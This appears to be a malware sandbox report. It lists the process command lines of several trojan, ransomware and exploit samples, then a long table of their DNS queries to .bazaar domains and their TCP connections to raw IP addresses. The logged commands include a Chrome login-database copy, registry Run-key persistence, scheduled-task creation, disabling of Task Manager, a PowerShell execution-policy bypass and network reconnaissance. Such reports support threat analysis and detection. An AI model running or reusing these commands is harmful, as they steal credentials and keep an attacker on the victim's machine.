C:\Users\Admin\Desktop\HEUR-B~1.EXE
C:\Users\Admin\Desktop\HEUR-B~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TRF665~1.EXE"
C:\Users\Admin\Desktop\TRF665~1.EXE
C:\Users\Admin\Desktop\TRF665~1.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /`e
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\taskmgr.exe" /0
C:\Windows\SysWOW64\taskmgr.exe
C:\Windows\system32\taskmgr.exe /0
C:\Windows\SysWOW64\cmd.exe
/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Program Files (x86)\M2d9\IconCache3frdbf.exe
"C:\Program Files (x86)\M2d9\IconCache3frdbf.exe"
C:\Program Files (x86)\M2d9\IconCache3frdbf.exe
"C:\Program Files (x86)\M2d9\IconCache3frdbf.exe"
C:\Windows\SysWOW64\NETSTAT.EXE
"C:\Windows\SysWOW64\NETSTAT.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~1.EXE"
C:\Users\Admin\Desktop\HEUR-T~1.EXE
C:\Users\Admin\Desktop\HEUR-T~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~4.EXE"
C:\Users\Admin\Desktop\HEUR-T~4.EXE
C:\Users\Admin\Desktop\HEUR-T~4.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HE4190~1.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HE058A~1.EXE"
C:\Users\Admin\Desktop\HE058A~1.EXE
C:\Users\Admin\Desktop\HE058A~1.EXE
C:\Users\Admin\Desktop\he058a~1.exe
C:\Users\Admin\Desktop\he058a~1.exe {5E4B6968-A162-4EC0-88EF-44CC6FF96D9B}
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\BACKDO~2.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEB5AA~1.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oAdQfQEfcUI" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9588.tmp"
C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe /Create /TN Updates\oAdQfQEfcUI /XML C:\Users\Admin\AppData\Local\Temp\tmp9588.tmp
C:\Users\Admin\Desktop\HEUR-T~1.EXE
"{path}"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-E~3.EXE"
C:\Users\Admin\Desktop\HEUR-T~4.EXE
"{path}"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~4.EXE"
C:\Users\Admin\Desktop\HEUR-T~4.EXE
C:\Users\Admin\Desktop\HEUR-T~4.EXE
C:\Windows\SysWOW64\PortableDeviceSyncProvider\d3dramp.exe
"C:\Windows\SysWOW64\PortableDeviceSyncProvider\d3dramp.exe"
C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System / v DisableTaskMgr / t REG_DWORD / d 1 / f
C:\Windows\SysWOW64\whoami.exe
whoami /all
C:\Windows\SysWOW64\cmd.exe
cmd /c set
C:\Windows\SysWOW64\arp.exe
arp -a
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Windows\SysWOW64\net.exe
net view /all
C:\Windows\SysWOW64\nslookup.exe
nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
C:\Windows\SysWOW64\net.exe
net share
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share
C:\Windows\SysWOW64\route.exe
route print
C:\Windows\SysWOW64\netstat.exe
netstat -nao
C:\Windows\SysWOW64\net.exe
net localgroup
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe
"C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE"
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upgrade /t REG_SZ /d "C:\Users\Admin\AppData\Local\main.exe""
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upgrade /t REG_SZ /d "C:\Users\Admin\AppData\Local\main.exe"
C:\Users\Admin\Desktop\HEUR-Exploit.Win32.ShellCode.vho-138c60f8df9c59cf59cbdfbf5004ceda539b0de2cd70207b79833805594a9746.exe
"C:\Users\Admin\Desktop\HEUR-Exploit.Win32.ShellCode.vho-138c60f8df9c59cf59cbdfbf5004ceda539b0de2cd70207b79833805594a9746.exe"
C:\Users\Admin\Desktop\HEUR-Trojan.Win32.Mansabo.vho-0bf5d57855e051e01e4547e1cb67aa4825618cbbeffefcf433d64e21881002de.exe
"C:\Users\Admin\Desktop\HEUR-Trojan.Win32.Mansabo.vho-0bf5d57855e051e01e4547e1cb67aa4825618cbbeffefcf433d64e21881002de.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-E~1.EXE"
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-E~1.EXE
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-E~1.EXE
C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\system32\ipconfig.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4020 -ip 4020
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\taskmgr.exe" /0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 684
C:\Windows\SysWOW64\taskmgr.exe
C:\Windows\system32\taskmgr.exe /0
Network
| Country | Destination | Domain | Proto |
| US | 162.248.241.94:53 | aecfijafefip.bazaar | udp |
| US | 107.172.42.186:53 | aecfijafefip.bazaar | udp |
| US | 167.99.153.82:53 | aecfijafefip.bazaar | udp |
| US | 138.197.25.214:53 | aecfijafefip.bazaar | udp |
| US | 69.164.196.21:53 | aecfijafefip.bazaar | udp |
| FR | 51.254.25.115:53 | ^eegilzfggir.bazaar | udp |
| IT | 193.183.98.66:53 | ^eegilzfggir.bazaar | udp |
| RU | 91.217.137.37:53 | ^eegilzfggir.bazaar | udp |
| FR | 87.98.175.85:53 | ^eegilzfggir.bazaar | udp |
| AT | 185.121.177.177:53 | ^eegilzfggir.bazaar | udp |
| ZA | 169.239.202.202:53 | ^eegilzfggir.bazaar | udp |
| US | 198.251.90.143:53 | ^eegilzfggir.bazaar | udp |
| AT | 5.132.191.104:53 | ^eegilzfggir.bazaar | udp |
| AU | 111.67.20.8:53 | ^eegilzfggir.bazaar | udp |
| AU | 163.53.248.170:53 | ^eegilzfggir.bazaar | udp |
| CA | 142.4.204.111:53 | ^eegilzfggir.bazaar | udp |
| CA | 142.4.205.47:53 | ^eegilzfggir.bazaar | udp |
| CA | 158.69.239.167:53 | ^eegilzfggir.bazaar | udp |
| CA | 104.37.195.178:53 | ^eegilzfggir.bazaar | udp |
| TR | 212.174.55.22:443 | tcp | |
| CA | 192.99.85.244:53 | ^eegilzfggir.bazaar | udp |
| CA | 158.69.160.164:53 | ^eegilzfggir.bazaar | udp |
| CH | 46.28.207.199:53 | ^eegilzfggir.bazaar | udp |
| ES | 84.78.128.76:2222 | tcp | |
| CH | 31.171.251.118:53 | ^eegilzfggir.bazaar | udp |
| CZ | 81.2.241.148:53 | ^eegilzfggir.bazaar | udp |
| FR | 51.254.25.115:53 | ^eegilzfggir.bazaar | udp |
| DE | 82.141.39.32:53 | ^eegilzfggir.bazaar | udp |
| DE | 50.3.82.215:53 | ^eegilzfggir.bazaar | udp |
| DE | 46.101.70.183:53 | ^eegilzfggir.bazaar | udp |
| DE | 5.45.97.127:53 | ^eegilzfggir.bazaar | udp |
| DE | 130.255.78.223:53 | ^eegilzfggir.bazaar | udp |
| DE | 144.76.133.38:53 | ^eegilzfggir.bazaar | udp |
| DE | 139.59.208.246:53 | ^eegilzfggir.bazaar | udp |
| DE | 172.104.136.243:53 | ^eegilzfggir.bazaar | udp |
| EC | 186.70.127.199:8090 | tcp | |
| EC | 45.71.112.70:53 | ^eegilzfggir.bazaar | udp |
| US | 104.131.103.37:8080 | tcp | |
| FR | 163.172.185.51:53 | ^eegilzfggir.bazaar | udp |
| FR | 87.98.175.85:53 | ^eegilzfggir.bazaar | udp |
| FR | 5.135.183.146:53 | ^eegilzfggir.bazaar | udp |
| FR | 51.255.48.78:53 | ^eegilzfggir.bazaar | udp |
| FR | 188.165.200.156:53 | ^eegilzfggir.bazaar | udp |
| ID | 203.153.216.189:7080 | tcp | |
| FR | 147.135.185.78:53 | ^eegilzfggir.bazaar | udp |
| FR | 92.222.97.145:53 | ^eegilzfggir.bazaar | udp |
| FR | 51.255.211.146:53 | ^eegilzfggir.bazaar | udp |
| GB | 159.89.249.249:53 | ^eegilzfggir.bazaar | udp |
| GB | 104.238.186.189:53 | ^eegilzfggir.bazaar | udp |
| IN | 139.59.23.241:53 | ^eegilzfggir.bazaar | udp |
| IT | 193.183.98.66:53 | ^eegilzfggir.bazaar | udp |
| IT | 94.177.171.127:53 | ^eegilzfggir.bazaar | udp |
| JP | 45.63.124.65:53 | ^eegilzfggir.bazaar | udp |
| LT | 212.24.98.54:53 | ^eegilzfggir.bazaar | udp |
| MD | 178.17.170.179:53 | ^eegilzfggir.bazaar | udp |
| NL | 185.208.208.141:53 | ^eegilzfggir.bazaar | udp |
| NL | 82.196.9.45:53 | ^eegilzfggir.bazaar | udp |
| NL | 146.185.176.36:53 | ^eegilzfggir.bazaar | udp |
| SE | 89.35.39.64:53 | ^eegilzfggir.bazaar | udp |
| RO | 89.18.27.167:53 | ^eegilzfggir.bazaar | udp |
| RU | 77.73.68.161:53 | ^eegilzfggir.bazaar | udp |
| RU | 91.217.137.37:53 | ^eegilzfggir.bazaar | udp |
| RU | 185.117.154.144:53 | ^eegilzfggir.bazaar | udp |
| SE | 176.126.70.119:53 | ^eegilzfggir.bazaar | udp |
| SG | 139.99.96.146:53 | ^eegilzfggir.bazaar | udp |
| UA | 217.12.210.54:53 | ^eegilzfggir.bazaar | udp |
| GB | 185.164.136.225:53 | ^eegilzfggir.bazaar | udp |
| US | 192.52.166.110:53 | ^eegilzfggir.bazaar | udp |
| US | 63.231.92.27:53 | ^eegilzfggir.bazaar | udp |
| CA | 66.70.211.246:53 | ^eegilzfggir.bazaar | udp |
| US | 96.47.228.108:53 | ^eegilzfggir.bazaar | udp |
| US | 45.32.160.206:53 | ^eegilzfggir.bazaar | udp |
| US | 128.52.130.209:53 | ^eegilzfggir.bazaar | udp |
| US | 35.196.105.24:53 | ^eegilzfggir.bazaar | udp |
| US | 172.98.193.42:53 | ^eegilzfggir.bazaar | udp |
| US | 162.248.241.94:53 | ^eegilzfggir.bazaar | udp |
| US | 107.172.42.186:53 | ^eegilzfggir.bazaar | udp |
| US | 167.99.153.82:53 | ^eegilzfggir.bazaar | udp |
| US | 138.197.25.214:53 | ^eegilzfggir.bazaar | udp |
| US | 69.164.196.21:53 | ^eegilzfggir.bazaar | udp |
| FR | 51.254.25.115:53 | acegimadggis.bazaar | udp |
| ES | 84.78.128.76:2222 | tcp | |
| IT | 193.183.98.66:53 | acegimadggis.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| RU | 91.217.137.37:53 | acegimadggis.bazaar | udp |
| FR | 87.98.175.85:53 | acegimadggis.bazaar | udp |
| AT | 185.121.177.177:53 | acegimadggis.bazaar | udp |
| ZA | 169.239.202.202:53 | acegimadggis.bazaar | udp |
| US | 198.251.90.143:53 | acegimadggis.bazaar | udp |
| AT | 5.132.191.104:53 | acegimadggis.bazaar | udp |
| AU | 111.67.20.8:53 | acegimadggis.bazaar | udp |
| AU | 163.53.248.170:53 | acegimadggis.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| CA | 142.4.204.111:53 | acegimadggis.bazaar | udp |
| CA | 142.4.205.47:53 | acegimadggis.bazaar | udp |
| CA | 158.69.239.167:53 | acegimadggis.bazaar | udp |
| CA | 104.37.195.178:53 | acegimadggis.bazaar | udp |
| CA | 192.99.85.244:53 | acegimadggis.bazaar | udp |
| CA | 158.69.160.164:53 | acegimadggis.bazaar | udp |
| CH | 46.28.207.199:53 | acegimadggis.bazaar | udp |
| CH | 31.171.251.118:53 | acegimadggis.bazaar | udp |
| CZ | 81.2.241.148:53 | acegimadggis.bazaar | udp |
| FR | 51.254.25.115:53 | acegimadggis.bazaar | udp |
| DE | 82.141.39.32:53 | acegimadggis.bazaar | udp |
| DE | 50.3.82.215:53 | acegimadggis.bazaar | udp |
| DE | 46.101.70.183:53 | acegimadggis.bazaar | udp |
| DE | 5.45.97.127:53 | acegimadggis.bazaar | udp |
| DE | 130.255.78.223:53 | acegimadggis.bazaar | udp |
| DE | 144.76.133.38:53 | acegimadggis.bazaar | udp |
| DE | 139.59.208.246:53 | acegimadggis.bazaar | udp |
| DE | 172.104.136.243:53 | acegimadggis.bazaar | udp |
| EC | 45.71.112.70:53 | acegimadggis.bazaar | udp |
| FR | 163.172.185.51:53 | acegimadggis.bazaar | udp |
| FR | 87.98.175.85:53 | acegimadggis.bazaar | udp |
| FR | 5.135.183.146:53 | acegimadggis.bazaar | udp |
| FR | 51.255.48.78:53 | acegimadggis.bazaar | udp |
| FR | 188.165.200.156:53 | acegimadggis.bazaar | udp |
| FR | 147.135.185.78:53 | acegimadggis.bazaar | udp |
| FR | 92.222.97.145:53 | acegimadggis.bazaar | udp |
| FR | 51.255.211.146:53 | acegimadggis.bazaar | udp |
| GB | 159.89.249.249:53 | acegimadggis.bazaar | udp |
| GB | 104.238.186.189:53 | acegimadggis.bazaar | udp |
| IN | 139.59.23.241:53 | acegimadggis.bazaar | udp |
| IT | 193.183.98.66:53 | acegimadggis.bazaar | udp |
| IT | 94.177.171.127:53 | acegimadggis.bazaar | udp |
| JP | 45.63.124.65:53 | acegimadggis.bazaar | udp |
| LT | 212.24.98.54:53 | acegimadggis.bazaar | udp |
| MD | 178.17.170.179:53 | acegimadggis.bazaar | udp |
| NL | 185.208.208.141:53 | acegimadggis.bazaar | udp |
| NL | 82.196.9.45:53 | acegimadggis.bazaar | udp |
| NL | 146.185.176.36:53 | acegimadggis.bazaar | udp |
| SE | 89.35.39.64:53 | acegimadggis.bazaar | udp |
| RO | 89.18.27.167:53 | acegimadggis.bazaar | udp |
| RU | 77.73.68.161:53 | acegimadggis.bazaar | udp |
| RU | 91.217.137.37:53 | acegimadggis.bazaar | udp |
| RU | 185.117.154.144:53 | acegimadggis.bazaar | udp |
| SE | 176.126.70.119:53 | acegimadggis.bazaar | udp |
| SG | 139.99.96.146:53 | acegimadggis.bazaar | udp |
| UA | 217.12.210.54:53 | acegimadggis.bazaar | udp |
| GB | 185.164.136.225:53 | acegimadggis.bazaar | udp |
| US | 192.52.166.110:53 | acegimadggis.bazaar | udp |
| US | 63.231.92.27:53 | acegimadggis.bazaar | udp |
| CA | 66.70.211.246:53 | acegimadggis.bazaar | udp |
| US | 96.47.228.108:53 | acegimadggis.bazaar | udp |
| US | 45.32.160.206:53 | acegimadggis.bazaar | udp |
| US | 128.52.130.209:53 | acegimadggis.bazaar | udp |
| US | 35.196.105.24:53 | acegimadggis.bazaar | udp |
| US | 172.98.193.42:53 | acegimadggis.bazaar | udp |
| US | 162.248.241.94:53 | acegimadggis.bazaar | udp |
| US | 107.172.42.186:53 | acegimadggis.bazaar | udp |
| US | 167.99.153.82:53 | acegimadggis.bazaar | udp |
| US | 138.197.25.214:53 | acegimadggis.bazaar | udp |
| US | 69.164.196.21:53 | acegimadggis.bazaar | udp |
| FR | 51.254.25.115:53 | bcehgkbdghgq.bazaar | udp |
| IT | 193.183.98.66:53 | bcehgkbdghgq.bazaar | udp |
| RU | 91.217.137.37:53 | bcehgkbdghgq.bazaar | udp |
| FR | 87.98.175.85:53 | bcehgkbdghgq.bazaar | udp |
| AT | 185.121.177.177:53 | bcehgkbdghgq.bazaar | udp |
| ZA | 169.239.202.202:53 | bcehgkbdghgq.bazaar | udp |
| US | 198.251.90.143:53 | bcehgkbdghgq.bazaar | udp |
| AT | 5.132.191.104:53 | bcehgkbdghgq.bazaar | udp |
| AU | 111.67.20.8:53 | bcehgkbdghgq.bazaar | udp |
| AU | 163.53.248.170:53 | bcehgkbdghgq.bazaar | udp |
| CA | 142.4.204.111:53 | bcehgkbdghgq.bazaar | udp |
| CA | 142.4.205.47:53 | bcehgkbdghgq.bazaar | udp |
| CA | 158.69.239.167:53 | bcehgkbdghgq.bazaar | udp |
| CA | 104.37.195.178:53 | bcehgkbdghgq.bazaar | udp |
| CA | 192.99.85.244:53 | bcehgkbdghgq.bazaar | udp |
| CA | 158.69.160.164:53 | bcehgkbdghgq.bazaar | udp |
| CH | 46.28.207.199:53 | bcehgkbdghgq.bazaar | udp |
| CH | 31.171.251.118:53 | bcehgkbdghgq.bazaar | udp |
| CZ | 81.2.241.148:53 | bcehgkbdghgq.bazaar | udp |
| US | 96.41.93.96:443 | tcp | |
| FR | 51.254.25.115:53 | bcehgkbdghgq.bazaar | udp |
| DE | 82.141.39.32:53 | bcehgkbdghgq.bazaar | udp |
| DE | 50.3.82.215:53 | bcehgkbdghgq.bazaar | udp |
| DE | 46.101.70.183:53 | bcehgkbdghgq.bazaar | udp |
| DE | 5.45.97.127:53 | bcehgkbdghgq.bazaar | udp |
| DE | 130.255.78.223:53 | bcehgkbdghgq.bazaar | udp |
| DE | 144.76.133.38:53 | bcehgkbdghgq.bazaar | udp |
| DE | 139.59.208.246:53 | bcehgkbdghgq.bazaar | udp |
| DE | 172.104.136.243:53 | bcehgkbdghgq.bazaar | udp |
| EC | 45.71.112.70:53 | bcehgkbdghgq.bazaar | udp |
| FR | 163.172.185.51:53 | bcehgkbdghgq.bazaar | udp |
| FR | 87.98.175.85:53 | bcehgkbdghgq.bazaar | udp |
| FR | 5.135.183.146:53 | bcehgkbdghgq.bazaar | udp |
| FR | 51.255.48.78:53 | bcehgkbdghgq.bazaar | udp |
| FR | 188.165.200.156:53 | bcehgkbdghgq.bazaar | udp |
| FR | 147.135.185.78:53 | bcehgkbdghgq.bazaar | udp |
| FR | 92.222.97.145:53 | bcehgkbdghgq.bazaar | udp |
| FR | 51.255.211.146:53 | bcehgkbdghgq.bazaar | udp |
| GB | 159.89.249.249:53 | bcehgkbdghgq.bazaar | udp |
| GB | 104.238.186.189:53 | bcehgkbdghgq.bazaar | udp |
| IN | 139.59.23.241:53 | bcehgkbdghgq.bazaar | udp |
| IT | 193.183.98.66:53 | bcehgkbdghgq.bazaar | udp |
| IT | 94.177.171.127:53 | bcehgkbdghgq.bazaar | udp |
| JP | 45.63.124.65:53 | bcehgkbdghgq.bazaar | udp |
| LT | 212.24.98.54:53 | bcehgkbdghgq.bazaar | udp |
| MD | 178.17.170.179:53 | bcehgkbdghgq.bazaar | udp |
| NL | 185.208.208.141:53 | bcehgkbdghgq.bazaar | udp |
| NL | 82.196.9.45:53 | bcehgkbdghgq.bazaar | udp |
| NL | 146.185.176.36:53 | bcehgkbdghgq.bazaar | udp |
| SE | 89.35.39.64:53 | bcehgkbdghgq.bazaar | udp |
| RO | 89.18.27.167:53 | bcehgkbdghgq.bazaar | udp |
| RU | 77.73.68.161:53 | bcehgkbdghgq.bazaar | udp |
| RU | 91.217.137.37:53 | bcehgkbdghgq.bazaar | udp |
| RU | 185.117.154.144:53 | bcehgkbdghgq.bazaar | udp |
| SE | 176.126.70.119:53 | bcehgkbdghgq.bazaar | udp |
| SG | 139.99.96.146:53 | bcehgkbdghgq.bazaar | udp |
| UA | 217.12.210.54:53 | bcehgkbdghgq.bazaar | udp |
| GB | 185.164.136.225:53 | bcehgkbdghgq.bazaar | udp |
| US | 192.52.166.110:53 | bcehgkbdghgq.bazaar | udp |
| US | 63.231.92.27:53 | bcehgkbdghgq.bazaar | udp |
| CA | 66.70.211.246:53 | bcehgkbdghgq.bazaar | udp |
| US | 96.47.228.108:53 | bcehgkbdghgq.bazaar | udp |
| US | 45.32.160.206:53 | bcehgkbdghgq.bazaar | udp |
| US | 128.52.130.209:53 | bcehgkbdghgq.bazaar | udp |
| US | 35.196.105.24:53 | bcehgkbdghgq.bazaar | udp |
| US | 172.98.193.42:53 | bcehgkbdghgq.bazaar | udp |
| US | 162.248.241.94:53 | bcehgkbdghgq.bazaar | udp |
| US | 107.172.42.186:53 | bcehgkbdghgq.bazaar | udp |
| US | 167.99.153.82:53 | bcehgkbdghgq.bazaar | udp |
| US | 138.197.25.214:53 | bcehgkbdghgq.bazaar | udp |
| US | 69.164.196.21:53 | bcehgkbdghgq.bazaar | udp |
| FR | 51.254.25.115:53 | caeiiicbgiio.bazaar | udp |
| IT | 193.183.98.66:53 | caeiiicbgiio.bazaar | udp |
| RU | 91.217.137.37:53 | caeiiicbgiio.bazaar | udp |
| FR | 87.98.175.85:53 | caeiiicbgiio.bazaar | udp |
| AT | 185.121.177.177:53 | caeiiicbgiio.bazaar | udp |
| ZA | 169.239.202.202:53 | caeiiicbgiio.bazaar | udp |
| US | 198.251.90.143:53 | caeiiicbgiio.bazaar | udp |
| AT | 5.132.191.104:53 | caeiiicbgiio.bazaar | udp |
| AU | 111.67.20.8:53 | caeiiicbgiio.bazaar | udp |
| AU | 163.53.248.170:53 | caeiiicbgiio.bazaar | udp |
| CA | 142.4.204.111:53 | caeiiicbgiio.bazaar | udp |
| CA | 142.4.205.47:53 | caeiiicbgiio.bazaar | udp |
| CA | 158.69.239.167:53 | caeiiicbgiio.bazaar | udp |
| CA | 104.37.195.178:53 | caeiiicbgiio.bazaar | udp |
| CA | 192.99.85.244:53 | caeiiicbgiio.bazaar | udp |
| CA | 158.69.160.164:53 | caeiiicbgiio.bazaar | udp |
| CH | 46.28.207.199:53 | caeiiicbgiio.bazaar | udp |
| CH | 31.171.251.118:53 | caeiiicbgiio.bazaar | udp |
| CZ | 81.2.241.148:53 | caeiiicbgiio.bazaar | udp |
| FR | 51.254.25.115:53 | caeiiicbgiio.bazaar | udp |
| DE | 82.141.39.32:53 | caeiiicbgiio.bazaar | udp |
| DE | 50.3.82.215:53 | caeiiicbgiio.bazaar | udp |
| DE | 46.101.70.183:53 | caeiiicbgiio.bazaar | udp |
| DE | 5.45.97.127:53 | caeiiicbgiio.bazaar | udp |
| DE | 130.255.78.223:53 | caeiiicbgiio.bazaar | udp |
| DE | 144.76.133.38:53 | caeiiicbgiio.bazaar | udp |
| DE | 139.59.208.246:53 | caeiiicbgiio.bazaar | udp |
| DE | 172.104.136.243:53 | caeiiicbgiio.bazaar | udp |
| EC | 45.71.112.70:53 | caeiiicbgiio.bazaar | udp |
| FR | 163.172.185.51:53 | caeiiicbgiio.bazaar | udp |
| FR | 87.98.175.85:53 | caeiiicbgiio.bazaar | udp |
| FR | 5.135.183.146:53 | caeiiicbgiio.bazaar | udp |
| FR | 51.255.48.78:53 | caeiiicbgiio.bazaar | udp |
| FR | 188.165.200.156:53 | caeiiicbgiio.bazaar | udp |
| FR | 147.135.185.78:53 | caeiiicbgiio.bazaar | udp |
| FR | 92.222.97.145:53 | caeiiicbgiio.bazaar | udp |
| FR | 51.255.211.146:53 | caeiiicbgiio.bazaar | udp |
| GB | 159.89.249.249:53 | caeiiicbgiio.bazaar | udp |
| GB | 104.238.186.189:53 | caeiiicbgiio.bazaar | udp |
| IN | 139.59.23.241:53 | caeiiicbgiio.bazaar | udp |
| IT | 193.183.98.66:53 | caeiiicbgiio.bazaar | udp |
| IT | 94.177.171.127:53 | caeiiicbgiio.bazaar | udp |
| JP | 45.63.124.65:53 | caeiiicbgiio.bazaar | udp |
| LT | 212.24.98.54:53 | caeiiicbgiio.bazaar | udp |
| MD | 178.17.170.179:53 | caeiiicbgiio.bazaar | udp |
| NL | 185.208.208.141:53 | caeiiicbgiio.bazaar | udp |
| NL | 82.196.9.45:53 | caeiiicbgiio.bazaar | udp |
| NL | 146.185.176.36:53 | caeiiicbgiio.bazaar | udp |
| SE | 89.35.39.64:53 | caeiiicbgiio.bazaar | udp |
| RO | 89.18.27.167:53 | caeiiicbgiio.bazaar | udp |
| RU | 77.73.68.161:53 | caeiiicbgiio.bazaar | udp |
| RU | 91.217.137.37:53 | caeiiicbgiio.bazaar | udp |
| RU | 185.117.154.144:53 | caeiiicbgiio.bazaar | udp |
| SE | 176.126.70.119:53 | caeiiicbgiio.bazaar | udp |
| SG | 139.99.96.146:53 | caeiiicbgiio.bazaar | udp |
| UA | 217.12.210.54:53 | caeiiicbgiio.bazaar | udp |
| GB | 185.164.136.225:53 | caeiiicbgiio.bazaar | udp |
| US | 192.52.166.110:53 | caeiiicbgiio.bazaar | udp |
| US | 63.231.92.27:53 | caeiiicbgiio.bazaar | udp |
| CA | 66.70.211.246:53 | caeiiicbgiio.bazaar | udp |
| US | 96.47.228.108:53 | caeiiicbgiio.bazaar | udp |
| US | 45.32.160.206:53 | caeiiicbgiio.bazaar | udp |
| US | 128.52.130.209:53 | caeiiicbgiio.bazaar | udp |
| US | 35.196.105.24:53 | caeiiicbgiio.bazaar | udp |
| US | 172.98.193.42:53 | caeiiicbgiio.bazaar | udp |
| US | 162.248.241.94:53 | caeiiicbgiio.bazaar | udp |
| US | 107.172.42.186:53 | caeiiicbgiio.bazaar | udp |
| US | 167.99.153.82:53 | caeiiicbgiio.bazaar | udp |
| US | 138.197.25.214:53 | caeiiicbgiio.bazaar | udp |
| US | 69.164.196.21:53 | caeiiicbgiio.bazaar | udp |
| FR | 51.254.25.115:53 | cadgikcbfgiq.bazaar | udp |
| IT | 193.183.98.66:53 | cadgikcbfgiq.bazaar | udp |
| RU | 91.217.137.37:53 | cadgikcbfgiq.bazaar | udp |
| FR | 87.98.175.85:53 | cadgikcbfgiq.bazaar | udp |
| AT | 185.121.177.177:53 | cadgikcbfgiq.bazaar | udp |
| ZA | 169.239.202.202:53 | cadgikcbfgiq.bazaar | udp |
| US | 198.251.90.143:53 | cadgikcbfgiq.bazaar | udp |
| RU | 176.96.238.128:443 | tcp | |
| AT | 5.132.191.104:53 | cadgikcbfgiq.bazaar | udp |
| AU | 111.67.20.8:53 | cadgikcbfgiq.bazaar | udp |
| AU | 163.53.248.170:53 | cadgikcbfgiq.bazaar | udp |
| CA | 142.4.204.111:53 | cadgikcbfgiq.bazaar | udp |
| CA | 142.4.205.47:53 | cadgikcbfgiq.bazaar | udp |
| CA | 158.69.239.167:53 | cadgikcbfgiq.bazaar | udp |
| CA | 104.37.195.178:53 | cadgikcbfgiq.bazaar | udp |
| US | 96.41.93.96:443 | tcp | |
| CA | 192.99.85.244:53 | cadgikcbfgiq.bazaar | udp |
| CA | 158.69.160.164:53 | cadgikcbfgiq.bazaar | udp |
| CH | 46.28.207.199:53 | cadgikcbfgiq.bazaar | udp |
| CH | 31.171.251.118:53 | cadgikcbfgiq.bazaar | udp |
| US | 45.33.77.42:8080 | tcp | |
| CZ | 81.2.241.148:53 | cadgikcbfgiq.bazaar | udp |
| FR | 51.254.25.115:53 | cadgikcbfgiq.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| DE | 82.141.39.32:53 | cadgikcbfgiq.bazaar | udp |
| TR | 85.105.140.135:443 | tcp | |
| DE | 50.3.82.215:53 | cadgikcbfgiq.bazaar | udp |
| DE | 46.101.70.183:53 | cadgikcbfgiq.bazaar | udp |
| DE | 5.45.97.127:53 | cadgikcbfgiq.bazaar | udp |
| DE | 130.255.78.223:53 | cadgikcbfgiq.bazaar | udp |
| DE | 144.76.133.38:53 | cadgikcbfgiq.bazaar | udp |
| DE | 139.59.208.246:53 | cadgikcbfgiq.bazaar | udp |
| DE | 172.104.136.243:53 | cadgikcbfgiq.bazaar | udp |
| EC | 181.211.11.242:80 | tcp | |
| EC | 45.71.112.70:53 | cadgikcbfgiq.bazaar | udp |
